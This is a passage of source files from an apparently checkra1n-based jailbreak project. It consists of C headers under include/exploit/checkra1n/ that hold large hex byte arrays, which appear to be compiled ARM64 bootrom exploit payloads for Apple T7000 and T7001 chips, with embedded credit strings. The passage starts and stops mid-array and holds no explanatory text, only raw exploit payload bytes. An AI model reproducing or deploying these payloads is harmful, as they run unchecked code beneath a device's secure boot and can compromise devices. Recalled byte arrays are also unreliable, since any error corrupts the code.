0x72, 0x05, 0x20, 0xb7, 0x52, 231 | 0x25, 0x21, 0x80, 0x72, 0x66, 0xa0, 0xba, 0x52, 0xe6, 0xf3, 0x87, 0x72, 232 | 0xe7, 0xcb, 0xba, 0x52, 0x07, 0x78, 0x80, 0x72, 0x08, 0x50, 0xbe, 0x52, 233 | 0x08, 0x01, 0x80, 0x72, 0x09, 0x80, 0xa6, 0x52, 0x4a, 0xac, 0xc0, 0x29, 234 | 0x5f, 0x01, 0x03, 0x6b, 0x60, 0x01, 0x44, 0x7a, 0xa1, 0xff, 0xff, 0x54, 235 | 0x4a, 0x2c, 0x41, 0x29, 0x7f, 0x01, 0x06, 0x6b, 0x64, 0x11, 0x47, 0x7a, 236 | 0x40, 0x01, 0x45, 0x7a, 0x01, 0xff, 0xff, 0x54, 0x4a, 0xc0, 0x5f, 0xb8, 237 | 0x4a, 0x35, 0x09, 0x12, 0x5f, 0x01, 0x08, 0x6b, 0x81, 0xfe, 0xff, 0x54, 238 | 0x4a, 0x10, 0x00, 0xd1, 0x4b, 0x61, 0x00, 0xd1, 0x4c, 0xcd, 0x5f, 0xb8, 239 | 0x8d, 0x35, 0x09, 0x12, 0xbf, 0x01, 0x09, 0x6b, 0x80, 0x00, 0x00, 0x54, 240 | 0x5f, 0x01, 0x0b, 0xeb, 0x68, 0xff, 0xff, 0x54, 0xeb, 0xff, 0xff, 0x17, 241 | 0x8c, 0x5d, 0x05, 0x13, 0x08, 0x80, 0xa2, 0x52, 0x88, 0x65, 0x00, 0x33, 242 | 0x48, 0x01, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6 243 | }; 244 | unsigned int yolo_t7000_bin_len = 2888; 245 | -------------------------------------------------------------------------------- /include/exploit/checkra1n/yolo_t7001.h: -------------------------------------------------------------------------------- 1 | unsigned char yolo_t7001_bin[] = { 2 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x00, 0x00, 0x00, 0x00, 3 | 0x00, 0x00, 0x00, 0xe0, 0x0c, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x38, 0x80, 4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf4, 0x0d, 0x01, 0x00, 5 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x00, 0x00, 0x00, 0x00, 0xf4, 0x0d, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 8 | 0x40, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0xf4, 0x0d, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 11 | 0x00, 0x00, 0x00, 0x00, 0x64, 0x2f, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 12 | 0x5c, 0xed, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 13 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 14 | 0xc0, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 0x48, 0x04, 0x00, 0x00, 15 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 17 | 0x00, 0x00, 0x00, 0x00, 0x24, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 18 | 0x00, 0x00, 0x00, 0x10, 0x21, 0x54, 0x00, 0x10, 0x7e, 0x01, 0x00, 0x10, 19 | 0x9f, 0x3f, 0x03, 0xd5, 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 20 | 0x1f, 0x00, 0x01, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 21 | 0xdf, 0x3f, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 22 | 0xc0, 0x03, 0x5f, 0xd6, 0xe0, 0x07, 0x61, 0xb2, 0x21, 0x00, 0xc0, 0xd2, 23 | 0x42, 0x00, 0xa0, 0x52, 0x04, 0x01, 0x00, 0x94, 0xe0, 0x07, 0x61, 0xb2, 24 | 0x00, 0x23, 0x9a, 0xf2, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x78, 0x80, 0x72, 25 | 0x01, 0x00, 0x00, 0xb9, 0xe0, 0x07, 0x61, 0xb2, 0x07, 0x30, 0x40, 0x91, 26 | 0x01, 0x80, 0xb2, 0x52, 0x01, 0x20, 0x80, 0x72, 0xe1, 0x00, 0x00, 0xb9, 27 | 0xe1, 0x03, 0x84, 0x52, 0x61, 0xa0, 0xba, 0x72, 0xe1, 0x38, 0x00, 0xb9, 28 | 0xe1, 0x48, 0x00, 0xb9, 0x01, 0x80, 0x40, 0x91, 0xe3, 0xff, 0xff, 0x97, 29 | 0x00, 0x20, 0x3e, 0xd5, 0x41, 0x20, 0x3e, 0xd5, 0x21, 0x14, 0x00, 0x12, 30 | 0x3f, 0x64, 0x00, 0x71, 0x62, 0x00, 0x00, 0x54, 0x00, 0x00, 0x40, 0xf9, 31 | 0x00, 0x8c, 0x74, 0x92, 0x00, 0x10, 0x40, 0xf9, 0x00, 0x8c, 0x74, 0x92, 32 | 0xa1, 0xd0, 0x80, 0xd2, 0x21, 0x04, 0x61, 0xb2, 0x01, 0x00, 0x00, 0xf9, 33 | 0x9f, 0x3f, 0x03, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 34 | 0xe7, 0x07, 0x61, 0xb2, 0xe7, 0x80, 0x43, 0x91, 0xe0, 0x00, 0x10, 0x91, 35 | 0x61, 0x01, 0x00, 0x10, 0x02, 0x32, 0x81, 0xd2, 0xdf, 0x00, 0x00, 0x94, 36 | 0xe0, 0x00, 0x10, 0x91, 0x01, 0x40, 0x26, 0x91, 0xcb, 0xff, 0xff, 0x97, 37 | 0x28, 0x00, 0xc0, 0xd2, 0x08, 0xc5, 0x80, 0xf2, 0x00, 0x00, 0x80, 0x52, 38 | 0x13, 0x00, 0x80, 0x52, 0x00, 0x01, 0x1f, 0xd6, 0xf9, 0x03, 0x00, 0xaa, 39 | 0xf8, 0x03, 0x01, 0xaa, 0xf7, 0x03, 0x1e, 0xaa, 0xf6, 0x03, 0x1d, 0xaa, 40 | 0xac, 0x01, 0x00, 0x94, 0x20, 0x03, 0x42, 0xb9, 0x81, 0x89, 0x89, 0x52, 41 | 0x41, 0x08, 0xa4, 0x72, 0x1f, 0x00, 0x01, 0x6b, 0x80, 0x01, 0x00, 0x54, 42 | 0x21, 0xcd, 0x89, 0x52, 0xe1, 0xed, 0xad, 0x72, 0x21, 0x03, 0x02, 0xb9, 43 | 0x20, 0x0b, 0x42, 0xb9, 0xe1, 0xac, 0x8c, 0x52, 0x21, 0x06, 0xa4, 0x72, 44 | 0x1f, 0x00, 0x01, 0x6b, 0x80, 0x00, 0x00, 0x54, 0xe0, 0x03, 0x19, 0xaa, 45 | 0xe8, 0x01, 0x00, 0x94, 0x04, 0x02, 0x00, 0x94, 0x20, 0x13, 0x00, 0x91, 46 | 0x01, 0xc0, 0xa6, 0x52, 0x01, 0x01, 0x80, 0x72, 0xe2, 0x4b, 0x0e, 0x32, 47 | 0xe3, 0x2b, 0x18, 0x32, 0x05, 0x3c, 0xc0, 0x92, 0x05, 0xf0, 0xbf, 0xf2, 48 | 0x05, 0x02, 0x80, 0xf2, 0x06, 0x50, 0xbe, 0xd2, 0xc7, 0x40, 0x00, 0x91, 49 | 0x06, 0x28, 0xf7, 0xf2, 0x06, 0x01, 0xc0, 0xf2, 0xe7, 0x0b, 0xf7, 0xf2, 50 | 0x07, 0x41, 0xd8, 0xf2, 0x00, 0x10, 0x00, 0x91, 0xc5, 0x01, 0x00, 0x94, 51 | 0xa0, 0x12, 0x00, 0xb4, 0x04, 0x80, 0x5f, 0xf8, 0x84, 0x00, 0x05, 0x8a, 52 | 0x9f, 0x00, 0x06, 0xeb, 0x84, 0x10, 0x47, 0xfa, 0x21, 0xff, 0xff, 0x54, 53 | 0x04, 0x21, 0x80, 0x52, 0x04, 0x40, 0xa6, 0x72, 0x04, 0x00, 0x00, 0xb9, 54 | 0x00, 0x10, 0x00, 0xd1, 0x01, 0x00, 0x80, 0x52, 0x01, 0x80, 0xb2, 0x72, 55 | 0x02, 0x00, 0x80, 0x52, 0x02, 0x80, 0xbf, 0x72, 0x03, 0x80, 0x00, 0xd1, 56 | 0x04, 0xcc, 0x5f, 0xf8, 0x84, 0x00, 0x02, 0x8a, 0x9f, 0x00, 0x01, 0xeb, 57 | 0x80, 0x00, 0x00, 0x54, 0x1f, 0x00, 0x03, 0xeb, 0x68, 0xff, 0xff, 0x54, 58 | 0x80, 0x00, 0x00, 0x14, 0x62, 0xa0, 0xba, 0x52, 0xe2, 0x03, 0x84, 0x72, 59 | 0x02, 0x08, 0x00, 0x29, 0xe0, 0x03, 0x19, 0xaa, 0xfc, 0x01, 0x00, 0x94, 60 | 0xe1, 0x2b, 0x18, 0x32, 0x01, 0x00, 0x01, 0x8b, 0x62, 0xa0, 0xba, 0x52, 61 | 0xe2, 0x03, 0x84, 0x72, 0x43, 0x80, 0x22, 0x11, 0x04, 0x80, 0xa2, 0x52, 62 | 0x07, 0x44, 0x80, 0xd2, 0x08, 0x00, 0x80, 0xd2, 0x1f, 0x00, 0x01, 0xeb, 63 | 0x22, 0x0e, 0x00, 0x54, 0x05, 0x00, 0x40, 0xb9, 0xbf, 0x00, 0x00, 0x71, 64 | 0xa4, 0x10, 0x42, 0x7a, 0xa4, 0x10, 0x43, 0x7a, 0xa4, 0x10, 0x44, 0x7a, 65 | 0x60, 0x00, 0x00, 0x54, 0x00, 0x10, 0x00, 0x91, 0xf7, 0xff, 0xff, 0x17, 66 | 0xe5, 0x03, 0x00, 0xaa, 0xa6, 0x4c, 0x40, 0xb8, 0xdf, 0x00, 0x00, 0x71, 67 | 0xc4, 0x10, 0x42, 0x7a, 0xc4, 0x10, 0x43, 0x7a, 0xc4, 0x10, 0x44, 0x7a, 68 | 0x60, 0x00, 0x00, 0x54, 0xe0, 0x03, 0x05, 0xaa, 0xee, 0xff, 0xff, 0x17, 69 | 0xa6, 0x00, 0x00, 0xcb, 0xdf, 0x00, 0x07, 0x6b, 0x42, 0x00, 0x00, 0x54, 70 | 0xf5, 0xff, 0xff, 0x17, 0xe9, 0x03, 0x00, 0xaa, 0xa8, 0x00, 0x00, 0xb5, 71 | 0xe8, 0x03, 0x09, 0xaa, 0xe0, 0x03, 0x05, 0xaa, 0x07, 0x44, 0x80, 0xd2, 72 | 0xe4, 0xff, 0xff, 0x17, 0xe0, 0x03, 0x08, 0xaa, 0x61, 0x0e, 0x00, 0x10, 73 | 0x02, 0x44, 0x80, 0xd2, 0x6e, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x09, 0xaa, 74 | 0xe1, 0x1e, 0x00, 0x10, 0x02, 0x44, 0x80, 0xd2, 0x6a, 0x00, 0x00, 0x94, 75 | 0x27, 0xc3, 0x09, 0x91, 0xe8, 0x24, 0x00, 0xa9, 0x20, 0x83, 0x0a, 0x91, 76 | 0xe8, 0x03, 0x00, 0xaa, 0x01, 0x0a, 0x00, 0x10, 0x02, 0x0c, 0x80, 0xd2, 77 | 0x63, 0x00, 0x00, 0x94, 0xe0, 0x03, 0x19, 0xaa, 0x01, 0x50, 0xba, 0x52, 78 | 0x41, 0x02, 0x80, 0x72, 0x02, 0x00, 0x80, 0x12, 0xe3, 0x2b, 0x18, 0x32, 79 | 0x70, 0x01, 0x00, 0x94, 0x00, 0x08, 0x00, 0xb4, 0xc1, 0xa3, 0xba, 0x52, 80 | 0x01, 0x00, 0x82, 0x72, 0xe2, 0x03, 0x80, 0x12, 0x03, 0x40, 0x80, 0x52, 81 | 0x73, 0x01, 0x00, 0x94, 0x40, 0x07, 0x00, 0xb4, 0xe1, 0x18, 0x00, 0x18, 82 | 0x02, 0x00, 0x80, 0x12, 0x03, 0x04, 0x80, 0x52, 0x65, 0x01, 0x00, 0x94, 83 | 0xa0, 0x06, 0x00, 0xb4, 0x24, 0x53, 0x09, 0x91, 0x05, 0x98, 0xc0, 0x29, 84 | 0x85, 0x18, 0x81, 0x28, 0x05, 0x18, 0x41, 0x29, 0xc7, 0x7c, 0x18, 0x53, 85 | 0xff, 0x60, 0x01, 0x71, 0x60, 0x00, 0x00, 0x54, 0x85, 0x18, 0x81, 0x28, 86 | 0x13, 0x00, 0x00, 0x14, 0x85, 0x44, 0x00, 0xb8, 0xc7, 0x5c, 0x05, 0x13, 87 | 0x07, 0xc8, 0x27, 0x8b, 0xe7, 0xc0, 0x40, 0xf8, 0xff, 0x3c, 0x50, 0xf2, 88 | 0xc1, 0x04, 0x00, 0x54, 0xc6, 0x10, 0x00, 0x12, 0x06, 0x58, 0xba, 0x72, 89 | 0xe5, 0xbc, 0x60, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 0x86, 0x44, 0x00, 0xb8, 90 | 0x06, 0x54, 0xbe, 0x72, 0xe5, 0x7c, 0x50, 0xd3, 0xa6, 0x3c, 0x1b, 0x33, 91 | 0x86, 0x44, 0x00, 0xb8, 0x06, 0x50, 0xbe, 0x72, 0xe6, 0x3c, 0x1b, 0x33, 92 | 0x86, 0x44, 0x00, 0xb8, 0xe1, 0xcb, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 93 | 0x81, 0x00, 0x00, 0xb9, 0x01, 0x58, 0xba, 0x52, 0x41, 0x02, 0x80, 0x72, 94 | 0x05, 0xbd, 0x60, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 0x01, 0x00, 0x00, 0xb9, 95 | 0x01, 0x54, 0xbe, 0x72, 0x05, 0x7d, 0x50, 0xd3, 0xa1, 0x3c, 0x1b, 0x33, 96 | 0x01, 0x04, 0x00, 0xb9, 0x01, 0x50, 0xbe, 0x72, 0x01, 0x3d, 0x1b, 0x33, 97 | 0x01, 0x08, 0x00, 0xb9, 0xe1, 0xc7, 0xba, 0x52, 0x01, 0x48, 0x80, 0x72, 98 | 0x01, 0x0c, 0x00, 0xb9, 0xe0, 0x03, 0x19, 0xaa, 0xe1, 0x03, 0x18, 0xaa, 99 | 0xfe, 0x03, 0x17, 0xaa, 0xfd, 0x03, 0x16, 0xaa, 0x9f, 0x3f, 0x03, 0xd5, 100 | 0xdf, 0x4f, 0x03, 0xd5, 0xc0, 0x03, 0x5f, 0xd6, 0x48, 0x00, 0xc0, 0xd2, 101 | 0x48, 0xc0, 0xa1, 0xf2, 0x08, 0x00, 0x94, 0xf2, 0x00, 0x01, 0x40, 0xb9, 102 | 0x00, 0x78, 0x1f, 0x12, 0x00, 0x01, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x14, 103 | 0xf2, 0x03, 0x1e, 0xaa, 0xc0, 0xcf, 0x74, 0x92, 0x00, 0x00, 0x2f, 0x91, 104 | 0x81, 0x02, 0x00, 0x18, 0xc2, 0x4f, 0x40, 0xb8, 0x5f, 0x00, 0x01, 0x6b, 105 | 0xc1, 0xff, 0xff, 0x54, 0x04, 0x00, 0x1e, 0xcb, 0x02, 0x80, 0xa2, 0x52, 106 | 0x82, 0x6c, 0x02, 0x33, 0xc2, 0x03, 0x00, 0xb9, 0x21, 0xfd, 0xff, 0x58, 107 | 0x02, 0x44, 0x80, 0xd2, 0x08, 0x00, 0x00, 0x94, 0x01, 0xfd, 0xff, 0x58, 108 | 0x02, 0x44, 0x80, 0xd2, 0x05, 0x00, 0x00, 0x94, 0x9f, 0x3f, 0x03, 0xd5, 109 | 0xdb, 0xff, 0xff, 0x17, 0x24, 0x44, 0x40, 0xb8, 0x04, 0x44, 0x00, 0xb8, 110 | 0x42, 0x10, 0x00, 0x71, 0xa2, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 111 | 0xdf, 0x4f, 0x03, 0xd5, 0xfc, 0x03, 0x1e, 0xaa, 0xfb, 0x03, 0x00, 0xaa, 112 | 0x48, 0x00, 0xc0, 0xd2, 0x48, 0xc0, 0xa1, 0xf2, 0x08, 0x00, 0x8e, 0xf2, 113 | 0x1f, 0x0d, 0x00, 0xb9, 0x1f, 0x1d, 0x00, 0xb9, 0xc8, 0x1d, 0x00, 0x58, 114 | 0x08, 0xc0, 0x1e, 0xd5, 0x40, 0x02, 0x00, 0x10, 0x21, 0x00, 0xc0, 0xd2, 115 | 0xe1, 0x01, 0xb0, 0xf2, 0x01, 0x00, 0x98, 0xf2, 0x22, 0x10, 0x40, 0x91, 116 | 0x2a, 0x04, 0x40, 0xd1, 0x1f, 0x00, 0x01, 0xeb, 0x02, 0x20, 0x42, 0xfa, 117 | 0x43, 0x01, 0x00, 0x54, 0x21, 0xc0, 0x01, 0x91, 0x22, 0x40, 0x0f, 0x91, 118 | 0xe3, 0x03, 0x01, 0xaa, 0x04, 0x44, 0x40, 0xb8, 0x24, 0x44, 0x00, 0xb8, 119 | 0x3f, 0x00, 0x02, 0xeb, 0xa3, 0xff, 0xff, 0x54, 0x9b, 0x00, 0x00, 0x94, 120 | 0x60, 0x00, 0x1f, 0xd6, 0xc0, 0x19, 0x00, 0x58, 0xe1, 0x19, 0x00, 0x58, 121 | 0x02, 0xc0, 0x81, 0x52, 0x9b, 0x00, 0x00, 0x94, 0x02, 0x58, 0x91, 0x52, 122 | 0x9e, 0x00, 0x00, 0x94, 0x80, 0x19, 0x00, 0x58, 0xbf, 0x41, 0x00, 0xd5, 123 | 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 0xbf, 0x40, 0x00, 0xd5, 124 | 0x1f, 0x00, 0x00, 0x91, 0x00, 0x08, 0x40, 0x91, 0xe8, 0x18, 0x00, 0x58, 125 | 0x00, 0x01, 0x00, 0xf9, 0x20, 0x00, 0xc0, 0xd2, 0x00, 0x1c, 0x40, 0x91, 126 | 0xe1, 0x03, 0x0a, 0xaa, 0x02, 0x00, 0x82, 0x52, 0x8b, 0x00, 0x00, 0x94, 127 | 0x00, 0x80, 0xb2, 0x52, 0xa0, 0x43, 0x8c, 0x72, 0x40, 0x2d, 0x0a, 0xb9, 128 | 0xe0, 0x7f, 0x8c, 0x72, 0x40, 0xb9, 0x02, 0xb9, 0x40, 0x88, 0x8c, 0x72, 129 | 0x40, 0xad, 0x01, 0xb9, 0xff, 0x44, 0x03, 0xd5, 0x1f, 0x75, 0x08, 0xd5, 130 | 0x29, 0x17, 0x00, 0x58, 0x07, 0x0c, 0xe0, 0xd2, 0x27, 0x84, 0x80, 0xf2, 131 | 0xe1, 0x03, 0x09, 0xaa, 0x02, 0x00, 0x90, 0x52, 0x81, 0x00, 0x00, 0x94, 132 | 0x28, 0x05, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 0x20, 0x11, 0x00, 0xf9, 133 | 0x00, 0x04, 0x40, 0x91, 0x00, 0x01, 0x00, 0xf9, 0x28, 0x09, 0x40, 0x91, 134 | 0x20, 0x00, 0xc0, 0xd2, 0x41, 0x00, 0xa0, 0x52, 0xe0, 0xd0, 0x80, 0xf2, 135 | 0x7f, 0x00, 0x00, 0x94, 0x40, 0x1d, 0x1a, 0x91, 0x00, 0x1d, 0x00, 0xf9, 136 | 0x00, 0x04, 0x40, 0x91, 0x00, 0x81, 0x00, 0xf9, 0x28, 0x0d, 0x40, 0x91, 137 | 0x00, 0x05, 0x40, 0xb2, 0x20, 0x19, 0x00, 0xf9, 0xe0, 0x07, 0x61, 0xb2, 138 | 0x01, 0x08, 0xa0, 0x52, 0xa0, 0xc0, 0x80, 0xf2, 0x78, 0x00, 0x00, 0x94, 139 | 0x28, 0x11, 0x40, 0x91, 0x00, 0x05, 0x40, 0xb2, 0x20, 0x21, 0x00, 0xf9, 140 | 0x40, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0xa2, 0x52, 0x00, 0x00, 0x07, 0xaa, 141 | 0x71, 0x00, 0x00, 0x94, 0xc0, 0x00, 0xc0, 0xd2, 0x01, 0x00, 0x80, 0x52, 142 | 0x00, 0x00, 0x07, 0xaa, 0xe8, 0x03, 0x09, 0xaa, 0x64, 0x00, 0x00, 0x94, 143 | 0x9f, 0x3f, 0x03, 0xd5, 0x80, 0xe0, 0x9f, 0x52, 0x00, 0xa2, 0x1e, 0xd5, 144 | 0x09, 0x20, 0x1e, 0xd5, 0x20, 0x00, 0xa0, 0x52, 0x80, 0xa3, 0x84, 0x72, 145 | 0x40, 0x20, 0x1e, 0xd5, 0x1f, 0x87, 0x0e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 146 | 0xc0, 0x01, 0x80, 0x52, 0x00, 0x11, 0x1e, 0xd5, 0xa8, 0x01, 0x82, 0x52, 147 | 0x00, 0x10, 0x3e, 0xd5, 0x00, 0x00, 0x08, 0xaa, 0x00, 0x10, 0x1e, 0xd5, 148 | 0xdf, 0x3f, 0x03, 0xd5, 0x48, 0x11, 0x00, 0x58, 0xe0, 0x10, 0x00, 0x58, 149 | 0x01, 0x02, 0xa0, 0x52, 0x01, 0x00, 0x80, 0x72, 0x22, 0x00, 0x80, 0x52, 150 | 0x00, 0x01, 0x3f, 0xd6, 0xd3, 0x10, 0x00, 0x10, 0xf4, 0x11, 0x00, 0x10, 151 | 0x68, 0x86, 0x40, 0xf8, 0x00, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 152 | 0x7f, 0x02, 0x14, 0xeb, 0x83, 0xff, 0xff, 0x54, 0x68, 0x11, 0x00, 0x58, 153 | 0x20, 0x00, 0x80, 0x52, 0x00, 0x01, 0x3f, 0xd6, 0xe0, 0x0b, 0x00, 0x10, 154 | 0x21, 0x11, 0x00, 0x58, 0xe2, 0x01, 0x80, 0xd2, 0x03, 0x14, 0x40, 0x38, 155 | 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 0xa2, 0xff, 0xff, 0x35, 156 | 0x60, 0x0b, 0x00, 0x70, 0x81, 0x10, 0x00, 0x58, 0xa2, 0x03, 0x80, 0xd2, 157 | 0x03, 0x14, 0x40, 0x38, 0x23, 0x14, 0x00, 0x38, 0x42, 0x04, 0x00, 0x51, 158 | 0xa2, 0xff, 0xff, 0x35, 0x40, 0x00, 0x80, 0x52, 0xe1, 0x0f, 0x00, 0x58, 159 | 0x20, 0x00, 0x00, 0xb9, 0xa8, 0x0e, 0x00, 0x58, 0x40, 0x0c, 0x00, 0x58, 160 | 0x01, 0x01, 0xa0, 0xd2, 0x00, 0x01, 0x3f, 0xd6, 0x42, 0x00, 0x00, 0x94, 161 | 0x9f, 0x3f, 0x03, 0xd5, 0xa0, 0x0b, 0x00, 0x58, 0x01, 0x00, 0x42, 0x91, 162 | 0x20, 0x7b, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 0x1f, 0x00, 0x01, 0xeb, 163 | 0xa3, 0xff, 0xff, 0x54, 0x18, 0x00, 0x00, 0x94, 0xdf, 0x4f, 0x03, 0xd5, 164 | 0xbf, 0x41, 0x00, 0xd5, 0xff, 0x03, 0x40, 0x92, 0x1f, 0x41, 0x18, 0xd5, 165 | 0x1f, 0xc0, 0x1e, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xfe, 0x03, 0x1c, 0xaa, 166 | 0xe0, 0x03, 0x1b, 0xaa, 0xc8, 0x09, 0x00, 0x58, 0x00, 0x01, 0x1f, 0xd6, 167 | 0x20, 0x00, 0xc0, 0xd2, 0x00, 0x01, 0xb0, 0xf2, 0x00, 0x78, 0x87, 0xf2, 168 | 0x01, 0x08, 0x80, 0x52, 0x05, 0x00, 0x00, 0x14, 0x20, 0x07, 0x40, 0xf9, 169 | 0x21, 0x8b, 0x42, 0x29, 0x00, 0x40, 0x22, 0x8b, 0x21, 0x00, 0x02, 0x4b, 170 | 0x20, 0x7e, 0x0b, 0xd5, 0x00, 0x00, 0x01, 0x91, 0x21, 0x00, 0x01, 0xf1, 171 | 0xa8, 0xff, 0xff, 0x54, 0x9f, 0x3f, 0x03, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 172 | 0x1f, 0x75, 0x08, 0xd5, 0xdf, 0x3f, 0x03, 0xd5, 0xc0, 0x03, 0x5f, 0xd6, 173 | 0x03, 0x10, 0xc1, 0xa8, 0x23, 0x10, 0x81, 0xa8, 0x42, 0x40, 0x00, 0x71, 174 | 0xa8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x3f, 0x7c, 0x81, 0xa8, 175 | 0x42, 0x40, 0x00, 0x71, 0xc8, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 176 | 0x04, 0xfc, 0x5b, 0xd3, 0x21, 0xfc, 0x5e, 0xd3, 0x03, 0x00, 0xa8, 0x52, 177 | 0x08, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x49, 0xd3, 0x21, 0xfc, 0x4c, 0xd3, 178 | 0x03, 0x00, 0x82, 0x52, 0x04, 0x00, 0x00, 0x14, 0x04, 0xfc, 0x52, 0xd3, 179 | 0x21, 0xfc, 0x55, 0xd3, 0x03, 0x04, 0xa0, 0x52, 0x84, 0x20, 0x7d, 0x92, 180 | 0x84, 0x00, 0x08, 0x8b, 0x02, 0x00, 0x80, 0x52, 0x80, 0x58, 0x22, 0xf8, 181 | 0x00, 0x00, 0x03, 0x8b, 0x42, 0x04, 0x00, 0x11, 0x5f, 0x00, 0x01, 0x6b, 182 | 0x83, 0xff, 0xff, 0x54, 0xc0, 0x03, 0x5f, 0xd6, 0x41, 0x00, 0xc0, 0xd2, 183 | 0x01, 0xc6, 0xa1, 0xf2, 0x81, 0x35, 0x80, 0xf2, 0x20, 0x00, 0x40, 0xb9, 184 | 0x00, 0x74, 0x1e, 0x12, 0x20, 0x00, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6, 185 | 0x1f, 0x20, 0x03, 0xd5, 0x59, 0x4f, 0x4c, 0x4f, 0x3a, 0x63, 0x68, 0x65, 186 | 0x63, 0x6b, 0x72, 0x61, 0x31, 0x6e, 0x00, 0x47, 0x41, 0x4e, 0x47, 0x3a, 187 | 0x4b, 0x4a, 0x43, 0x20, 0x48, 0x41, 0x58, 0x58, 0x3a, 0x41, 0x78, 0x69, 188 | 0x30, 0x6d, 0x58, 0x20, 0x45, 0x54, 0x41, 0x3a, 0x73, 0x6f, 0x6e, 0x00, 189 | 0x00, 0xc0, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x80, 190 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x0c, 0x80, 0x01, 0x00, 0x00, 0x00, 191 | 0x00, 0x00, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x50, 0x0c, 0x80, 192 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x80, 0x01, 0x00, 0x00, 0x00, 193 | 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x80, 194 | 0x01, 0x00, 0x00, 0x00, 0xf0, 0x9d, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 195 | 0x2c, 0xec, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x74, 0xe2, 0x00, 0x00, 196 | 0x01, 0x00, 0x00, 0x00, 0x54, 0x28, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 197 | 0xbc, 0x11, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0xf2, 0x00, 0x00, 198 | 0x01, 0x00, 0x00, 0x00, 0xbc, 0x1d, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 199 | 0x4c, 0x30, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x90, 0x8e, 0x08, 0x80, 200 | 0x01, 0x00, 0x00, 0x00, 0xc7, 0x8e, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 201 | 0x44, 0x8e, 0x08, 0x80, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0xb9, 202 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 203 | 0x00, 0x10, 0x00, 0x91, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 204 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0x04, 0x00, 0x40, 0xb9, 205 | 0x84, 0x00, 0x02, 0x0a, 0x9f, 0x00, 0x01, 0x6b, 0xa0, 0x00, 0x00, 0x54, 206 | 0x00, 0x10, 0x00, 0xd1, 0x63, 0x10, 0x00, 0x51, 0x43, 0xff, 0xff, 0x35, 207 | 0xe0, 0x03, 0x1f, 0xaa, 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 208 | 0xa5, 0x4e, 0xb2, 0x52, 0x05, 0x00, 0x9a, 0x72, 0x06, 0x48, 0xb6, 0x52, 209 | 0xe7, 0x43, 0xb5, 0x52, 0x28, 0x40, 0xa5, 0x52, 0x08, 0x7c, 0x80, 0x72, 210 | 